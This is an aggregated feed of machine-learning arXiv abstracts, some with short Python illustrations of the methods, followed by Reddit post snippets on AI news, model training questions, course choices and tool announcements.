    The Implicit Bias of Batch Normalization in Linear Models and Two-layer Linear Convolutional Neural Networks. (arXiv:2306.11680v2 [cs.LG] UPDATED)
    We study the implicit bias of batch normalization trained by gradient descent. We show that when learning a linear model with batch normalization for binary classification, gradient descent converges to a uniform margin classifier on the training data with an $\exp(-\Omega(\log^2 t))$ convergence rate. This distinguishes linear models with batch normalization from those without batch normalization in terms of both the type of implicit bias and the convergence rate. We further extend our result to a class of two-layer, single-filter linear convolutional neural networks, and show that batch normalization has an implicit bias towards a patch-wise uniform margin. Based on two examples, we demonstrate that patch-wise uniform margin classifiers can outperform the maximum margin classifiers in certain learning problems. Our results contribute to a better theoretical understanding of batch normalization.
    Comparison of High-Dimensional Bayesian Optimization Algorithms on BBOB. (arXiv:2303.00890v2 [cs.LG] UPDATED)
    Bayesian Optimization (BO) is a class of black-box, surrogate-based heuristics that can efficiently optimize problems that are expensive to evaluate, and hence admit only small evaluation budgets. BO is particularly popular for solving numerical optimization problems in industry, where the evaluation of objective functions often relies on time-consuming simulations or physical experiments. However, many industrial problems depend on a large number of parameters. This poses a challenge for BO algorithms, whose performance is often reported to suffer when the dimension grows beyond 15 variables. Although many new algorithms have been proposed to address this problem, it is not well understood which one is the best for which optimization scenario. In this work, we compare five state-of-the-art high-dimensional BO algorithms, with vanilla BO and CMA-ES on the 24 BBOB functions of the COCO environment at increasing dimensionality, ranging from 10 to 60 variables. Our results confirm the superiority of BO over CMA-ES for limited evaluation budgets and suggest that the most promising approach to improve BO is the use of trust regions. However, we also observe significant performance differences for different function landscapes and budget exploitation phases, indicating improvement potential, e.g., through hybridization of algorithmic components.
    A stochastic optimization approach to minimize robust density power-based divergences for general parametric density models. (arXiv:2307.05251v1 [stat.ME])
    Density power divergence (DPD) [Basu et al. (1998), Biometrika], designed to estimate the underlying distribution of the observations robustly, comprises an integral term of the power of the parametric density models to be estimated. While the explicit form of the integral term can be obtained for some specific densities (such as normal density and exponential density), its computational intractability has prohibited the application of DPD-based estimation to more general parametric densities, over a quarter of a century since the proposal of DPD. This study proposes a stochastic optimization approach to minimize DPD for general parametric density models and explains its adequacy by referring to conventional theories on stochastic optimization. The proposed approach also can be applied to the minimization of another density power-based $\gamma$-divergence with the aid of unnormalized models [Kanamori and Fujisawa (2015), Biometrika].
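The observation that makes a stochastic approach possible is that the intractable integral term equals an expectation under the model itself, $\int f_\theta^{1+\alpha}\,dx = \mathbb{E}_{x \sim f_\theta}[f_\theta(x)^\alpha]$, so it admits an unbiased Monte Carlo estimate from model samples. A sketch for a normal density, where the closed form is known and can be checked (the values of alpha and the sample size are arbitrary):

```python
import numpy as np

rng = np.random.default_rng(0)
alpha, mu, sigma = 0.5, 0.0, 1.0   # arbitrary choices for illustration

def pdf(x):
    return np.exp(-(x - mu) ** 2 / (2 * sigma ** 2)) / np.sqrt(2 * np.pi * sigma ** 2)

# int f^(1+alpha) dx = E_{x ~ f}[f(x)^alpha]: estimate it from model samples.
x = rng.normal(mu, sigma, size=200_000)
mc_estimate = np.mean(pdf(x) ** alpha)

# For the normal density the term has a closed form, so we can check.
closed_form = (2 * np.pi * sigma ** 2) ** (-alpha / 2) / np.sqrt(1 + alpha)
print(mc_estimate, closed_form)
```

For general parametric densities the closed form is unavailable, and this sampled term plugs into a stochastic gradient scheme, which is the setting the paper develops.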
    BayesFlow: Amortized Bayesian Workflows With Neural Networks. (arXiv:2306.16015v2 [cs.LG] UPDATED)
    Modern Bayesian inference involves a mixture of computational techniques for estimating, validating, and drawing conclusions from probabilistic models as part of principled workflows for data analysis. Typical problems in Bayesian workflows are the approximation of intractable posterior distributions for diverse model types and the comparison of competing models of the same process in terms of their complexity and predictive performance. This manuscript introduces the Python library BayesFlow for simulation-based training of established neural network architectures for amortized data compression and inference. Amortized Bayesian inference, as implemented in BayesFlow, enables users to train custom neural networks on model simulations and re-use these networks for any subsequent application of the models. Since the trained networks can perform inference almost instantaneously, the upfront neural network training is quickly amortized.
    Geometric Neural Diffusion Processes. (arXiv:2307.05431v1 [stat.ML])
    Denoising diffusion models have proven to be a flexible and effective paradigm for generative modelling. Their recent extension to infinite dimensional Euclidean spaces has allowed for the modelling of stochastic processes. However, many problems in the natural sciences incorporate symmetries and involve data living in non-Euclidean spaces. In this work, we extend the framework of diffusion models to incorporate a series of geometric priors in infinite-dimension modelling. We do so by a) constructing a noising process which admits, as limiting distribution, a geometric Gaussian process that transforms under the symmetry group of interest, and b) approximating the score with a neural network that is equivariant w.r.t. this group. We show that with these conditions, the generative functional model admits the same symmetry. We demonstrate scalability and capacity of the model, using a novel Langevin-based conditional sampler, to fit complex scalar and vector fields, with Euclidean and spherical codomain, on synthetic and real-world weather data.
    Leveraging Variational Autoencoders for Parameterized MMSE Channel Estimation. (arXiv:2307.05352v1 [eess.SP])
    In this manuscript, we propose to utilize the generative neural network-based variational autoencoder for channel estimation. The variational autoencoder models the underlying true but unknown channel distribution as a conditional Gaussian distribution in a novel way. The derived channel estimator exploits the internal structure of the variational autoencoder to parameterize an approximation of the mean squared error optimal estimator resulting from the conditional Gaussian channel models. We provide a rigorous analysis under which conditions a variational autoencoder-based estimator is mean squared error optimal. We then present considerations that make the variational autoencoder-based estimator practical and propose three different estimator variants that differ in their access to channel knowledge during the training and evaluation phase. In particular, the proposed estimator variant trained solely on noisy pilot observations is particularly noteworthy as it does not require access to noise-free, ground-truth channel data during training or evaluation. Extensive numerical simulations first analyze the internal behavior of the variational autoencoder-based estimators and then demonstrate excellent channel estimation performance compared to related classical and machine learning-based state-of-the-art channel estimators.
    Reinforcement Learning with Non-Cumulative Objective. (arXiv:2307.04957v1 [cs.LG])
    In reinforcement learning, the objective is almost always defined as a \emph{cumulative} function over the rewards along the process. However, there are many optimal control and reinforcement learning problems in various application fields, especially in communications and networking, where the objectives are not naturally expressed as summations of the rewards. In this paper, we recognize the prevalence of non-cumulative objectives in various problems, and propose a modification to existing algorithms for optimizing such objectives. Specifically, we dive into the fundamental building block for many optimal control and reinforcement learning algorithms: the Bellman optimality equation. To optimize a non-cumulative objective, we replace the original summation operation in the Bellman update rule with a generalized operation corresponding to the objective. Furthermore, we provide sufficient conditions on the form of the generalized operation as well as assumptions on the Markov decision process under which the globally optimal convergence of the generalized Bellman updates can be guaranteed. We demonstrate the idea experimentally with the bottleneck objective, i.e., the objectives determined by the minimum reward along the process, on classical optimal control and reinforcement learning tasks, as well as on two network routing problems on maximizing the flow rates.
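The proposed modification can be sketched for the bottleneck objective on a toy deterministic chain, where the Bellman backup's usual sum $r + V(s')$ is replaced by $\min(r, V(s'))$; the chain and rewards are invented:

```python
import numpy as np

# Invented 4-state deterministic chain: from state s the single action moves to
# s + 1 with edge reward r[s]; the episode ends at state 3. For the bottleneck
# objective (return = minimum reward along the path), the Bellman backup
# replaces the usual sum r + V(s') with min(r, V(s')).
r = np.array([5.0, 2.0, 7.0])
V = np.zeros(4)
V[3] = np.inf                      # identity element of min at the terminal state
for _ in range(10):                # generalized value iteration
    for s in range(3):
        V[s] = min(r[s], V[s + 1])
print(V[:3])                       # each state's value is its downstream bottleneck
```

Here the generalized operation is `min`, matching the flow-rate style objectives the paper targets; `np.inf` plays the role zero plays for summation.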
    Law of Large Numbers for Bayesian two-layer Neural Network trained with Variational Inference. (arXiv:2307.04779v1 [stat.ML])
    We provide a rigorous analysis of training by variational inference (VI) of Bayesian neural networks in the two-layer and infinite-width case. We consider a regression problem with a regularized evidence lower bound (ELBO) which is decomposed into the expected log-likelihood of the data and the Kullback-Leibler (KL) divergence between the a priori distribution and the variational posterior. With an appropriate weighting of the KL, we prove a law of large numbers for three different training schemes: (i) the idealized case with exact estimation of a multiple Gaussian integral from the reparametrization trick, (ii) a minibatch scheme using Monte Carlo sampling, commonly known as Bayes by Backprop, and (iii) a new and computationally cheaper algorithm which we introduce as Minimal VI. An important result is that all methods converge to the same mean-field limit. Finally, we illustrate our results numerically and discuss the need for the derivation of a central limit theorem.
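The reparametrization trick underlying training schemes (i) and (ii) can be illustrated on a single Gaussian weight: writing $w = \mu + \sigma\varepsilon$ makes the pathwise Monte Carlo gradient of $\mathbb{E}[w^2]$ with respect to $\mu$ an average of $2w$, matching the analytic value $2\mu$. The numbers below are arbitrary:

```python
import numpy as np

rng = np.random.default_rng(0)
mu, sigma = 1.5, 0.8                  # arbitrary variational parameters

# Reparametrize w = mu + sigma * eps so the sample is a differentiable
# function of (mu, sigma); the pathwise gradient of E[w^2] w.r.t. mu is E[2w].
eps = rng.normal(size=100_000)
w = mu + sigma * eps
grad_mu = np.mean(2 * w)
print(grad_mu)                        # analytic value: 2 * mu = 3.0
```

Bayes by Backprop applies exactly this estimator to the expected log-likelihood term of the ELBO, with minibatches replacing the full sample.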
    Perturbed-History Exploration in Stochastic Linear Bandits. (arXiv:1903.09132v2 [cs.LG] UPDATED)
    We propose a new online algorithm for cumulative regret minimization in a stochastic linear bandit. The algorithm pulls the arm with the highest estimated reward in a linear model trained on its perturbed history. Therefore, we call it perturbed-history exploration in a linear bandit (LinPHE). The perturbed history is a mixture of observed rewards and randomly generated i.i.d. pseudo-rewards. We derive a $\tilde{O}(d \sqrt{n})$ gap-free bound on the $n$-round regret of LinPHE, where $d$ is the number of features. The key steps in our analysis are new concentration and anti-concentration bounds on the weighted sum of Bernoulli random variables. To show the generality of our design, we generalize LinPHE to a logistic model. We evaluate our algorithms empirically and show that they are practical.
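A hedged sketch of the perturbed-history idea in the simpler Bernoulli (non-linear-model) case: each arm's estimate mixes its observed rewards with randomly generated Bernoulli(1/2) pseudo-rewards, and the arm with the highest perturbed mean is pulled. The arm means, horizon, and perturbation scale `a_param` are invented for illustration:

```python
import numpy as np

rng = np.random.default_rng(0)
means = np.array([0.3, 0.7])      # hypothetical Bernoulli arm means
a_param = 1.0                     # pseudo-rewards per observed reward (assumption)
hist = [[], []]
pulls = np.zeros(2, dtype=int)

for t in range(2000):
    est = np.zeros(2)
    for k in range(2):
        s = len(hist[k])
        if s == 0:
            est[k] = np.inf       # force an initial pull of each arm
        else:
            m = int(np.ceil(a_param * s))
            z = rng.binomial(m, 0.5)              # i.i.d. pseudo-rewards
            est[k] = (sum(hist[k]) + z) / (s + m)
    k = int(np.argmax(est))
    hist[k].append(int(rng.binomial(1, means[k])))
    pulls[k] += 1

print(pulls)  # the better arm should dominate
```

LinPHE replaces the per-arm means with a linear model refit on the perturbed history, which is what yields the $\tilde{O}(d\sqrt{n})$ regret bound.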
    Dynamics of Temporal Difference Reinforcement Learning. (arXiv:2307.04841v1 [stat.ML])
    Reinforcement learning has been successful across several applications in which agents have to learn to act in environments with sparse feedback. However, despite this empirical success there is still a lack of theoretical understanding of how the parameters of reinforcement learning models and the features used to represent states interact to control the dynamics of learning. In this work, we use concepts from statistical physics, to study the typical case learning curves for temporal difference learning of a value function with linear function approximators. Our theory is derived under a Gaussian equivalence hypothesis where averages over the random trajectories are replaced with temporally correlated Gaussian feature averages and we validate our assumptions on small scale Markov Decision Processes. We find that the stochastic semi-gradient noise due to subsampling the space of possible episodes leads to significant plateaus in the value error, unlike in traditional gradient descent dynamics. We study how learning dynamics and plateaus depend on feature structure, learning rate, discount factor, and reward function. We then analyze how strategies like learning rate annealing and reward shaping can favorably alter learning dynamics and plateaus. To conclude, our work introduces new tools to open a new direction towards developing a theory of learning dynamics in reinforcement learning.
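The object under analysis, semi-gradient TD(0) with linear function approximation, can be sketched on a toy random-walk chain; tabular features are the special case `phi = I`, and all constants here are invented:

```python
import numpy as np

rng = np.random.default_rng(0)
n_states = 5
phi = np.eye(n_states)             # tabular features: a special case of linear features
w = np.zeros(n_states)
gamma, lr = 0.9, 0.1

for episode in range(2000):
    s = 2                          # start in the middle of the chain
    while True:
        s2 = s + (1 if rng.random() < 0.5 else -1)
        done = s2 < 0 or s2 >= n_states
        r = 1.0 if s2 >= n_states else 0.0       # reward only at the right exit
        target = r if done else r + gamma * phi[s2] @ w
        w += lr * (target - phi[s] @ w) * phi[s]  # semi-gradient TD(0) update
        if done:
            break
        s = s2

print(w)  # roughly increasing toward the rewarding right end
```

The "semi-gradient" label reflects that the target `r + gamma * phi[s2] @ w` is treated as constant in the update; the paper studies the noise this subsampled update injects into the learning dynamics.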


    MAMAY AI-powered algorithm digitises taste for food and beverage makers
    submitted by /u/trueslicky [link] [comments]  ( 8 min )
    Jesus in 2023 lmao
    submitted by /u/reinkrestfoxy [link] [comments]  ( 8 min )
    Can AI replicate a character's voice cracks and raspy voice?
I used RVC V2 to make an AI model of a character whose voice is raspy, has a lot of voice cracks, and is very "shouty". I used a dataset that was 70% voice clips of him yelling and/or talking loudly, with the rest of him talking normally. The dataset was decent quality; I did have to use background-music remover software on some parts, but it's overall decent. The thing is, the model doesn't sound ANYTHING like the character. For some reason it's way too soft spoken, and even when it's supposed to be yelling or screaming it sounds like he's whispering. The AI's neutral voice does sound like him, but it's missing his voice cracks and raspiness. Is there any way I can mimic them? submitted by /u/donutpancito [link] [comments]  ( 8 min )
    Inside the AI Factory (about the underclass work force)
    submitted by /u/facinabush [link] [comments]  ( 8 min )
    Behind the secretive work of the many, many humans helping to train AI
    submitted by /u/facinabush [link] [comments]  ( 8 min )
    if you stare into the abyss, the abyss stares back at you
    I'm scared of AI but this is one of my favourite quotes and the result is magnificent submitted by /u/peditte [link] [comments]  ( 8 min )
    Anthropic releases Claude 2 with 100K token limit
    submitted by /u/wyem [link] [comments]  ( 8 min )
    AI Can Accurately Predict Potentially Fatal Cardiac Events in Firefighters
    submitted by /u/nist [link] [comments]  ( 8 min )
    Report: China to tighten rules around releasing generative AI tools
    submitted by /u/PleasantLiberation [link] [comments]  ( 8 min )
    AI Robots Admit They'd Run Earth Better Than 'Clouded' Humans
    submitted by /u/ChubbyBrunch [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/10/2023
    Just like other large chip designers, AMD has already started to use AI for designing chips. In fact, Lisa Su, chief executive of AMD, believes that eventually, AI-enabled tools will dominate chip design as the complexity of modern processors is increasing exponentially.[1] Comedian Sarah Silverman and two authors are suing Meta and ChatGPT-maker OpenAI, alleging the companies’ AI language models were trained on copyrighted materials from their books without their knowledge or consent.[2] Several hospitals, including the Mayo Clinic, have begun test-driving Google’s Med-PaLM 2, an AI chatbot that is widely expected to shake up the healthcare industry. Med-PaLM 2 is an updated model of PaLM2, which the tech giant announced at Google I/O earlier this year. PaLM 2 is the language model underpinning Google’s AI tool, Bard.[3] Japanese police will begin testing security cameras equipped with AI-based technology to protect high-profile public figures, Nikkei has learned, as the country mourns the anniversary of the fatal shooting of former Prime Minister Shinzo Abe on Saturday. The technology could lead to the detection of suspicious activity, supplementing existing security measures.[4] Sources: [1] https://www.tomshardware.com/news/lisa-su-ai-will-dominate-chip-design [2] https://www.cnn.com/2023/07/10/tech/sarah-silverman-openai-meta-lawsuit/index.html [3] https://www.foxbusiness.com/technology/hospitals-begin-test-driving-googles-medical-ai-chatbot-report [4] https://asia.nikkei.com/Politics/Japan-police-to-test-AI-equipped-cameras-in-protecting-VIPs submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
Would disruptive denial-of-service AI be a viable option in internet malpractice, since it's progressed so much?
    title submitted by /u/Icy_Independence_125 [link] [comments]  ( 8 min )
  • Open

    [D] Regression for Everyone
    Check my article on Regression. I'd love to hear your thoughts ☺️ https://medium.com/@sandundayananda/regression-fef89ad7c68f submitted by /u/sandun-dayananda [link] [comments]  ( 8 min )
    [D] Masters of AI/Machine Learning
I have a Bachelor's in Electrical Engineering, valedictorian, 4.00 out of 4.00 CGPA. IELTS 7.5, and I have been working in the AI center of a research company for 3 months now. I have 2 papers published; one of them is on Falcon 40B. My employer asked me to pursue a master's degree in AI or machine learning. The tuition fees don't matter (fully sponsored). The degree has to be certified as (MSc of Artificial Intelligence) OR (MSc of Machine Learning), not (MSc of Computer Science). The university should be QS World Rank 100 to 200. I applied to: 1- Imperial College London 2- Monash University 3- University of Technology Sydney I need a fourth option. I prefer a university that provides a solid background in computer science since I have an electrical engineering bachelor's. Also, I must start by spring 2024 at the latest. Thank you ❤️ submitted by /u/Maithah_x [link] [comments]  ( 9 min )
[P] Benchmarking NVIDIA RAPIDS vs. Pandas: Join our Experiment with Thousands of GPUs!
    We are excited to announce a benchmarking experiment comparing the performance of NVIDIA RAPIDS and Pandas, two powerful data manipulation libraries, on a large Kubernetes-based cluster. Our cluster consists of thousands of A4000 GPUs, providing an excellent opportunity to evaluate these libraries for various workloads that involve data scrubbing. If you're interested in participating, we are offering the necessary compute resources, and you can even define your own datasets! What is NVIDIA RAPIDS? NVIDIA RAPIDS is a suite of open-source software libraries and APIs that accelerate data science and analytics workflows on GPUs. It aims to provide GPU-accelerated alternatives to popular data science tools, including Pandas. RAPIDS leverages the power of GPUs to speed up data processing, maki…  ( 9 min )
    [R] Semantic-SAM: Segment and Recognize Anything at Any Granularity
We introduce Semantic-SAM, a universal image segmentation model that enables segmenting and recognizing anything at any desired granularity. 🔥code & demo link: https://github.com/UX-Decoder/Semantic-SAM 🔥paper link: https://arxiv.org/pdf/2307.04767.pdf 🔥Our model offers the following attributes from instance to part level: Granularity Abundance. Our model can produce all possible segmentation granularities for a user click with high quality, which enables more **controllable** and **user-friendly** interactive segmentation. Semantic Awareness. We jointly train SA-1B with semantically labeled datasets to learn the semantics at both the object level and the part level. High Quality. We build on a DETR-based model to implement both generic and interactive segmentation, and validate that SA-1B hel…  ( 9 min )
[D] Confusion over AMD GPU AI benchmarking
I'm using an AI benchmark from this website: https://ai-benchmark.com/ranking_deeplearning.html. It was the only AI benchmark I could find that I could understand. For some reason the results are in AMD's favor. I always thought AI wasn't good enough on AMD, but it's beating out the 4090! Am I using this benchmark wrong, or has AMD really gotten good recently? Also, if anyone knows another benchmark I could use, that would be wonderful. https://preview.redd.it/c779j1pb4ebb1.png?width=1565&format=png&auto=webp&s=d62f003587c73443cc83acf98f14a69c4ee14d2c submitted by /u/SociallyApparent [link] [comments]  ( 8 min )
    [P] Reward Prioritization
    Hi all! I will preface by saying I am very new to machine learning. I understand the fundamentals but have little practice in implementation. I am trying to create an AI to play a game that I have re-created in Python by using TensorFlow/Keras. The game is similar to Tetris, and the goal is for the user to survive for as long as possible and the user can score more points by making more complex moves. In my current situation, the game has been entirely coded and converted to a useable format for the AI (I used OpenAI’s Gymnasium (the open-source fork)). Over the last two days I have created the Neural Net model (5 Dense layers with 6 output options) and have been tweaking variables with little noticeable difference in the AI’s abilities. While I certainly need help in several areas and am open to any and all recommendations, I currently feel that my issues lie in the rewards. Currently the AI plays 5000 rounds, then keeps the best 10% of all games based on the reward score. Currently the longer it survives, the higher the reward. However, I also want the model to prioritize score similarly to survival time. To compare this to Tetris, the player could survive for 1 hour only scoring 1-liners, or 5 minutes scoring 90% Tetris’s and end up with a higher ‘score’ than the one that survives longer. I am looking for a compromise between these two extremes that will allow me to select the best 10% of all the games played. I know that I may not have explained this problem very well, but I am open to all suggestions, and all comments are appreciated. Thanks! submitted by /u/TCPisJustFancyUDP [link] [comments]  ( 9 min )
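On the two-objective selection problem above, one common compromise (sketched here as my own illustration with made-up numbers, not the poster's code) is to min-max normalize each objective across the batch of games and rank episodes by a weighted sum, so neither raw survival time nor raw score dominates simply because of its units:

```python
def select_top_episodes(episodes, w_time=0.5, w_score=0.5, keep_frac=0.10):
    """episodes: list of (survival_time, score) tuples.
    Min-max normalize each objective across the batch, rank by a
    weighted sum, and keep the top fraction."""
    def minmax(vals):
        lo, hi = min(vals), max(vals)
        span = hi - lo if hi > lo else 1.0
        return [(v - lo) / span for v in vals]

    times = minmax([t for t, _ in episodes])
    scores = minmax([s for _, s in episodes])
    combined = [w_time * t + w_score * s for t, s in zip(times, scores)]
    ranked = sorted(range(len(episodes)), key=lambda i: combined[i], reverse=True)
    k = max(1, int(len(episodes) * keep_frac))
    return [episodes[i] for i in ranked[:k]]

# toy batch of (survival_time, score) pairs
batch = [(60, 10), (5, 90), (30, 50), (10, 5), (55, 60),
         (20, 20), (45, 30), (15, 70), (50, 15), (25, 40)]
best = select_top_episodes(batch, keep_frac=0.2)
print(best)  # -> [(55, 60), (60, 10)]
```

The weights `w_time` and `w_score` are tuning knobs; a product or a lexicographic ranking are alternatives if a weighted sum still favors one extreme.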
    "[D]" Problems with Lazy Config detectron2 (MViTv2)
    Hey. So, I want to use a config file from a detectron2 project which is undere MViTv2 in my custom dataset which is "my_dataset_train" (datacatalog format) I want to use this config file https://github.com/facebookresearch/detectron2/blob/main/projects/MViTv2/configs/mask_rcnn_mvitv2_t_3x.py like the beneath typical way I use a yaml config file. But giving so many errors one after another that, I even failed to count at this point. ​ I have to use this config file with the dataloader which is in https://github.com/facebookresearch/detectron2/blob/main/projects/MViTv2/configs/common/coco_loader.py. I figured that i can use cfg.dataloader.train.dataset.names = "my_dataset_train" for this. ​ cfg = LazyConfig.load("detectron2/projects/MViTv2/configs/mask_rcnn_mvitv2_t_3x.py") cfg.dataloader.train.dataset.names = "my_dataset_train" train = model_zoo.get_config("common/train.py").train cfg.train.amp.enabled = True cfg.train.ddp.fp16_compression = True cfg.lr_multiplier = L(WarmupParamScheduler)( scheduler=L(MultiStepParamScheduler)( values=[1.0, 0.1, 0.01], milestones=[52500, 62500, 67500], ), warmup_length=250 / train.max_iter, warmup_factor=0.001, ) # cfg.train.init_checkpoint = "detectron2://ImageNetPretrained/mvitv2/MViTv2_T_in1k.pyth" ​ cfg.dataloader.train.total_batch_size = 1 cfg.train.max_iter = 200 cfg.optimizer = model_zoo.get_config("common/optim.py").AdamW cfg.optimizer.lr = 1.6e-4 dataset = instantiate(cfg.dataloader.train) # optimizer = instantiate(cfg.optimizer) # optimizer = model_zoo.get_config("common/optim.py").A ​ # trainer = AMPTrainer(model, dataset, optimizer) trainer = DefaultTrainer(cfg) trainer.train() # FileLink(str(OUTPUT_MODEL)) ​ But typical trainer.train(start_iter,cfg.max_iter) is not working here? How can run this without shell command? Thanks everyone submitted by /u/Ok-Reflection-4049 [link] [comments]  ( 9 min )
    [D] Keras 3.0 Announcement: Keras for TensorFlow, JAX, and PyTorch
    Keras just announced a preview version of Keras 3.0. It's a full rewrite of the Keras codebase that rebases it on top of a modular backend architecture. It makes it possible to run Keras workflows on top of arbitrary frameworks — starting with TensorFlow, JAX, and PyTorch. https://keras.io/keras_core/announcement/ submitted by /u/codemaker1 [link] [comments]  ( 8 min )
Backpropagation with Cross-Entropy and Softmax, HOW? [D]
Let Zs be the inputs of the output layer (for example, Z1 is the input of the first neuron in the output layer), Os be the outputs of the output layer (which are the results of applying the softmax activation function to the Zs; for example, O1 = softmax(Z1)), and Ys be the target values (which are 0 or 1, because in this example we are dealing with classification problems and using one-hot encoding). E is the sum of the neurons' losses using the cross-entropy loss function. Let's say our neural network has 2 output neurons, and Y1 = 1 (so Y2 = 0). What is the derivative of E with respect to Z1, and the derivative of E with respect to Z2? After calculations, I came to the conclusion that the derivatives of E with respect to the Zs (Z1 and Z2) should all be equal, because they are all equal to O1 - 1 (since Y1 = 1, as I said). So am I right or wrong? (And why?) submitted by /u/qaz_zaqi [link] [comments]  ( 9 min )
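For what it's worth, the standard result for softmax followed by cross-entropy is dE/dZi = Oi - Yi, so with Y1 = 1 the two derivatives are O1 - 1 and O2, which are not equal in general (in the 2-neuron case they are negatives of each other, since O1 + O2 = 1). A quick pure-Python finite-difference check, using my own arbitrary example values:

```python
import math

def softmax(z):
    m = max(z)                          # subtract max for numerical stability
    e = [math.exp(v - m) for v in z]
    s = sum(e)
    return [v / s for v in e]

def cross_entropy(z, y):
    o = softmax(z)
    return -sum(yi * math.log(oi) for yi, oi in zip(y, o))

z = [0.7, -0.3]   # pre-activations of the two output neurons (arbitrary)
y = [1.0, 0.0]    # one-hot target: Y1 = 1

o = softmax(z)
analytic = [oi - yi for oi, yi in zip(o, y)]   # claim: dE/dZi = Oi - Yi

# central finite-difference approximation of dE/dZi
eps = 1e-6
numeric = []
for i in range(len(z)):
    zp = z[:]; zp[i] += eps
    zm = z[:]; zm[i] -= eps
    numeric.append((cross_entropy(zp, y) - cross_entropy(zm, y)) / (2 * eps))

print(analytic)   # dE/dZ1 = O1 - 1 (negative), dE/dZ2 = O2 (positive)
print(numeric)    # matches the analytic gradient
```

So the answer to the question above is: the derivatives are not all equal to O1 - 1; only dE/dZ1 is, while dE/dZ2 = O2.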
    Generating a step by step painting [D]
I have been thinking about this for a long time. Is there any way we can generate each step of a painting from an image input? If I give an image as input, it should be able to give me step-by-step instructions on how to paint it. I like painting but I got bored of You submitted by /u/dosa-palli-chutney [link] [comments]  ( 8 min )
    [D] Compared to paying a monthly subscription to ChatGPT, or per token for long-form content on the OpenAI platform, Is Poe.com's annual payment worth the money?
    Pretty much as the title says. I'm wondering whether it would be cheaper paying for PdfGPT, Claude2 and GPT-4 access separately, or Poe.com as a bundle? submitted by /u/RTSBasebuilder [link] [comments]  ( 8 min )
    [R] Why was Tacotron trained on <1000h of data?
Tacotron TTS models (e.g. Tacotron 2 and Parallel Tacotron 2) were trained on 25h and 405h of speech data, respectively. By comparison, more recent TTS systems are trained on >50,000h of speech data. Why were Tacotron models trained on such a relatively small volume of data? Was it simply a matter of compute resources, or is there something in the Tacotron architecture/training set-up that explains the relatively small training size? submitted by /u/Upstairs_Buy_6243 [link] [comments]  ( 8 min )
    [Discussion] AWS Sagemaker Issue
Hi everyone, I have data that includes these columns: customer_id, product_id, product_title, product_category, star_rating. I used the functions and code with descriptions below, plus an AWS SageMaker config, to create the model training. Then I tried to write a function that predicts the 5 best products for 1 customer using this model via the deployed endpoint. Screenshots:
https://preview.redd.it/i3b2pm099cbb1.jpg?width=966&format=pjpg&auto=webp&s=1aa12ca864e500c1d0bc0e823e8c9e88c0a36316
https://preview.redd.it/nolhkl299cbb1.jpg?width=1002&format=pjpg&auto=webp&s=8d49a232620361076d802fd20ee124fa8a7c2feb
https://preview.redd.it/ge5ggs299cbb1.jpg?width=895&format=pjpg&auto=webp&s=c58b80ff6a2af85546563d0a257da4cc3540da9f
https://preview.redd.it/slbqok299cbb1.jpg?width=1028&format=pjpg&auto=webp&s=5ee8c5733dde42f1eb7d113c5eb0e0a6d3ba739c
https://preview.redd.it/zu3nun099cbb1.jpg?width=1018&format=pjpg&auto=webp&s=86a29a222ab05ef4d4ed5c4eaf6fc321e1cfe194
https://preview.redd.it/bk9qif299cbb1.jpg?width=826&format=pjpg&auto=webp&s=80169c891de0ff3dd2e98fb5be3aa9eaa29b35c6
https://preview.redd.it/n1yigg299cbb1.jpg?width=898&format=pjpg&auto=webp&s=5a3f09983f9cddda1e0772ce473271a84790055d
Nevertheless, I got a strange issue and cannot resolve it: SSLError: SSL validation failed for https://runtime.sagemaker.us-east-1.amazonaws.com/endpoints/factorization-machines-2023-07-10-12-13-54-256/invocations EOF occurred in violation of protocol (_ssl.c:2396). Could someone please help me explain this, give me a solution, or help me solve it? submitted by /u/Hung_98 [link] [comments]  ( 8 min )
    [D] Seeking Comprehensive Project Tutorial for Industry Popular ML Tech Stack
    Hi all, I have a MS that focused in AI/ML, and took a role for the last several years that was supposed to focus on ML but never did. I'm now looking for jobs in this area and want to be able to list understanding/proficiency in industry popular technologies on my resume. Specifically, I'm looking to incorporate the following: Data Preprocessing: Numpy, pandas, SQL for data extraction Machine Learning Frameworks: TensorFlow, PyTorch (perform GPU training), Keras, XGBoost, LightGBM Model Deployment and Scalability: Docker and Kubernetes Big Data Processing: Apache Spark, Hadoop Version Control: Git Cloud Services: AWS, Microsoft Azure, or Google Cloud Platform System: Unix-Based I know these individual technologies have their own tutorials and documentation online. Does anyone have a more comprehensive project/tutorial that integrates these technologies? I'd like to create my own project that I can put on my resume to demonstrate proficiency, but I'm feeling a bit overwhelmed learning the entire stack and how to integrate it. Thanks! submitted by /u/ruseriousrightnow [link] [comments]  ( 9 min )
    [D] Scaling Neuroscience Research Using Federated Learning
https://ieeexplore.ieee.org/document/9433925 Research on Federated Learning and its applications moved a step forward! https://github.com/NevronAI/metisfl submitted by /u/No-Literature-1930 [link] [comments]  ( 8 min )
[D] Weird loss behaviour with diffusion models
Has anyone had this happen when training a diffusion model? The loss decreases to a very low value (close to 0) quite early (around halfway through the first epoch), and keeps oscillating there. Image quality improves throughout training but the loss isn't really decreasing, just fluctuating around the same values. I had this happen when training pixel-space diffusion models (with latent diffusion the loss seems to decrease gradually), and when fine-tuning Stable Diffusion with textual inversion (the loss isn't really decreasing whereas image quality is increasing). submitted by /u/theotherfellah [link] [comments]  ( 8 min )
    [R] Large Language Models as General Pattern Machines. In context, LLMs are capable of completing a wide variety of complex non linguistic patterns.
    Blog/Paper - https://general-pattern-machines.github.io/ submitted by /u/MysteryInc152 [link] [comments]  ( 8 min )
    [P] [R] Machine Unlearning Summary
    Hey, fellow data enthusiasts! We made a Kaggle notebook that delves into an intriguing concept called "Machine Unlearning: The Right to Be Forgotten." If you're interested in exploring the uncharted territory of reversing machine learning models and allowing data to be forgotten, this notebook is an absolute must-read! 📚 Notebook: https://www.kaggle.com/code/tamlhp/machine-unlearning-the-right-to-be-forgotten/ Overview: We all know how machine learning algorithms have transformed our lives by uncovering patterns and making predictions. However, what if we want to reverse this process and erase the knowledge acquired by these models? That's where machine unlearning comes into play, and this notebook provides an in-depth exploration of this cutting-edge concept. Key Highlights: Unde…  ( 9 min )
    [D] - Representation Learning MSc course: Videos + PyTorch exercises
